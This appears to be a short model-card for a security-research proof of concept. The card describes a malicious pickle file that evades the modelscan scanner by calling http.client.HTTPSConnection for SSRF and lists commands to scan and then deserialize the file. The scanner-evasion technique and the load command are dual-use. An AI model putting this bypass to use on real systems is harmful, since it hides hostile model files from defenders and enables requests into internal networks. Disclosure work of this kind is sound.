metadata
license: mit
tags:
- security-research
- modelscan-bypass
modelscan-bypass-http-client-ssrf
Impact
HIGH - SSRF via HTTPS connection
Technique
http.client.HTTPSConnection() - http.client not in blocklist (only httplib is)
Verification
# Scan with modelscan - should show "No issues found"
modelscan scan -p model.pkl
# Execute to verify malicious behavior
python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())"
Details
Modelscan bypass via http.client - SSRF Tested against modelscan v0.7.6 (latest PyPI release).